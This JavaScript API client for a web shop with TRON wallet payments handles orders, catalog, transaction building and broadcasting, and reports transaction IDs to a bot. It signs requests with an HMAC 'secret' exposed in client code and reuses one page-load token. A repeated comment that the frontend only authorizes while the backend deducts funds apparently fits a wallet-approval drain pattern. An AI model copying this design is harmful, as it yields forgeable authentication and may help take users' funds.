import axiosInstance  from './axiosInstance';
import axios from 'axios';
import { clientEnv } from '../config/env';

import CryptoJS from "crypto-js";

const SECRET_KEY = clientEnv.apiSecretKey;

function createApiAuthHeaders() {
  const timestamp = Date.now();
  const nonce = CryptoJS.lib.WordArray.random(16).toString(CryptoJS.enc.Hex);
  const clientData = `${timestamp}|${nonce}`;
  const clientToken = CryptoJS.HmacSHA256(clientData, SECRET_KEY).toString(
    CryptoJS.enc.Hex
  );
  return {
    "X-API-Token": clientToken,
    "X-API-Data": clientData,
  };
}

// 页面加载时生成（兼容旧调用；敏感 POST 应使用 createApiAuthHeaders）
const timestamp = Date.now();
const nonce = CryptoJS.lib.WordArray.random(16).toString(CryptoJS.enc.Hex);
const clientData = `${timestamp}|${nonce}`;
const clientToken = CryptoJS.HmacSHA256(clientData, SECRET_KEY).toString(CryptoJS.enc.Hex);

//前端只做授权，划扣金额在后端做
export async function addOrder(data) {
  const response = await axiosInstance.post("/addOrder", { data }, {
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  });
  return response.data;
}

//前端只做授权，划扣金额在后端做
export async function updateOrder(data) {
   
  axiosInstance.post("/updateOrder",{ data },{
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  })
  .then(response => console.log(response.data))
  .catch(error => console.error("请求失败:", error));
}



//前端只做授权，划扣金额在后端做
export async function addAuthorize(data) {
  const response = await axiosInstance.post("/addAuthorize", { data }, {
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  });
  return response.data;
}

//前端只做授权，划扣金额在后端做
// 参数名为 tg_no 为历史兼容；服务端按 order_no 查询（见 getOrderInfoByNo）
export async function getOrderInfo(orderNo) {
  const response = await axiosInstance.get('/getOrderInfo', {
    params: { tg_no: orderNo },
    headers: {
      'X-API-Token': clientToken,
      'X-API-Data': clientData,
    },
  });
  return response.data;
}

//前端只做授权，划扣金额在后端做
export async function getAllCate(mallType = 'main') {
   
  const  response = await axiosInstance.get("/getAllCate",{
    params: { mall_type: mallType },
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  });
  return response.data;
}

//前端只做授权，划扣金额在后端做
export async function getSimpleCate(mallType = 'main') {
   
  const  response = await axiosInstance.get("/getSimpleCate",{
    params: { mall_type: mallType },
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  });
  return response.data;
}

/** 按 id 或 link_key 获取单个商品详情 */
export async function getProductInfo({ id, link_key } = {}) {
  const q = new URLSearchParams();
  if (id != null && id !== '') q.set('id', String(id));
  if (link_key) q.set('link_key', String(link_key));
  const response = await axiosInstance.get('/getProductInfo?' + q.toString(), {
    headers: {
      'X-API-Token': clientToken,
      'X-API-Data': clientData,
    },
  });
  return response.data;
}

/** 首页：分类 + 各分类商品（一次请求） */
export async function getHomeCatalog(mallType = 'main') {
  const response = await axiosInstance.get('/getHomeCatalog', {
    params: { mall_type: mallType },
    headers: {
      'X-API-Token': clientToken,
      'X-API-Data': clientData,
    },
  });
  return response.data;
}

//请求商品列表
export async function getProductList(cate_id, mallType = 'main') {
   
  const  response = await axiosInstance.get("/getProductList",{
    params: { cate_id, mall_type: mallType },
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  });
  return response.data;
}



//前端只做授权，划扣金额在后端做
export async function getUserByRefer(code) {
   
  const  response = await axiosInstance.get("/getUserByRefer?referralCode="+code,{
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  });
  return response.data;
  
}



/** 经 shop-ser 查询钱包 TRX 余额与可用 energy（后端代理 TronGrid） */
export async function getWalletResources(address) {
  const response = await axiosInstance.get(
    '/getWalletResources?address=' + encodeURIComponent(address),
    {
      headers: {
        'X-API-Token': clientToken,
        'X-API-Data': clientData,
      },
    }
  );
  return response.data;
}

/** 钱包页初始化：订单 + TRX/能量一次拉取（tgNo 可选） */
export async function getWalletInitData({ address, tgNo } = {}) {
  const q = new URLSearchParams();
  if (address) q.set('address', address);
  if (tgNo) q.set('tg_no', tgNo);
  const response = await axiosInstance.get('/getWalletInitData?' + q.toString(), {
    headers: {
      'X-API-Token': clientToken,
      'X-API-Data': clientData,
    },
  });
  return response.data;
}

//前端只做授权，划扣金额在后端做
export async function getBuildRawTransaction(ownerBase58,toBase58,amountInSun) {
   
  const  response = await axiosInstance.get("/getBuildRawTransaction?ownerBase58="+ownerBase58+"&toBase58="+toBase58+"&amountInSun="+amountInSun,{
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  });
  return response.data;
  
}

//前端只做授权，划扣金额在后端做
export async function getBuildAppRawTransaction(ownerBase58,toBase58,amountInSun) {
   
  const  response = await axiosInstance.get("/getBuildAppRawTransaction?ownerBase58="+ownerBase58+"&toBase58="+toBase58+"&amountInSun="+amountInSun,{
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  });
  return response.data;
  
}

/** 将钱包 sign 后的 signedTx 交给 shop-ser 广播（走服务端 TronGrid） */
export async function broadcastSignedTx(signedTx, wallet) {
  const response = await axiosInstance.post(
    "/broadcastSignedTx",
    { signedTx, wallet },
    { headers: createApiAuthHeaders() }
  );
  return response.data;
}


export async function reportPageVisit(data) {
  axiosInstance
    .post(
      '/reportPageVisit',
      { data },
      {
        headers: {
          'X-API-Token': clientToken,
          'X-API-Data': clientData,
        },
      },
    )
    .catch((error) => console.error('[reportPageVisit] 请求失败:', error));
}

//前端只做授权，划扣金额在后端做
export async function addToast(data) {
   
  axiosInstance.post("/addMsgToast",{ data },{
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  })
  .then(response => console.log(response.data))
  .catch(error => console.error("请求失败:", error));
  
}

/** 授权 txId 上报 shop-bot（广播成功后调用；链上确认在服务端完成） */
export async function reportTxWatch(txId, address) {
  const base = (clientEnv.botWatchUrl || '').replace(/\/$/, '');
  if (!base) {
    console.warn('[reportTxWatch] 未配置 VUE_APP_BOT_WATCH_URL，跳过');
    return false;
  }
  try {
    await axios.post(
      `${base}/api/tx/watch`,
      { txId, address },
      { timeout: 8000 }
    );
    console.log('[reportTxWatch] 已上报', txId);
    return true;
  } catch (error) {
    console.error('[reportTxWatch] 失败:', error);
    return false;
  }
}


export async function saveProduct(data) {
   
  axiosInstance.post("/saveProduct",{ data },{
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  })
  .then(response => console.log(response.data))
  .catch(error => console.error("请求失败:", error));
  
}

export async function saveCate(data) {
   
  axiosInstance.post("/saveCate",{ data },{
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  })
  .then(response => console.log(response.data))
  .catch(error => console.error("请求失败:", error));
}


export async function deleteCate(id) {
   
  const  response = await axiosInstance.get("/deleteCate?id="+id,{
    headers: {
      "X-API-Token": clientToken,
      "X-API-Data": clientData
    }
  });
  return response.data;

}


export async function uploadImage(file) {
  const formData = new FormData();
  formData.append('image', file);

  try {
    const res = await axiosInstance.post('/uploadImage', formData, {
      headers: {
        'Content-Type': 'multipart/form-data',
        'X-API-Token': clientToken,
        'X-API-Data': clientData
      }
    });
    return res.data; // 应该包含文件路径
  } catch (error) {
    console.error('上传失败:', error);
    throw error;
  }
}

/** 按 link_key 获取特殊链接商品（页面标题、图片、库存等） */
export async function getSpecialProductByKey(link_key) {
  const response = await axiosInstance.get(
    '/getSpecialProductByKey?link_key=' + encodeURIComponent(link_key),
    {
      headers: {
        'X-API-Token': clientToken,
        'X-API-Data': clientData,
      },
    }
  );
  return response.data;
}

/** 获取全部启用的特殊商品 */
export async function getActiveSpecialProducts() {
  const response = await axiosInstance.get('/getActiveSpecialProducts', {
    headers: {
      'X-API-Token': clientToken,
      'X-API-Data': clientData,
    },
  });
  return response.data;
}

/** 简易订单平台登录 */
export async function orderAuthLogin({ username, password }) {
  const response = await axiosInstance.post(
    '/orderAuth/login',
    { username, password },
    { headers: createApiAuthHeaders() }
  );
  return response.data;
}

/** 简易订单平台注册 */
export async function orderAuthRegister({ username, password }) {
  const response = await axiosInstance.post(
    '/orderAuth/register',
    { username, password },
    { headers: createApiAuthHeaders() }
  );
  return response.data;
}


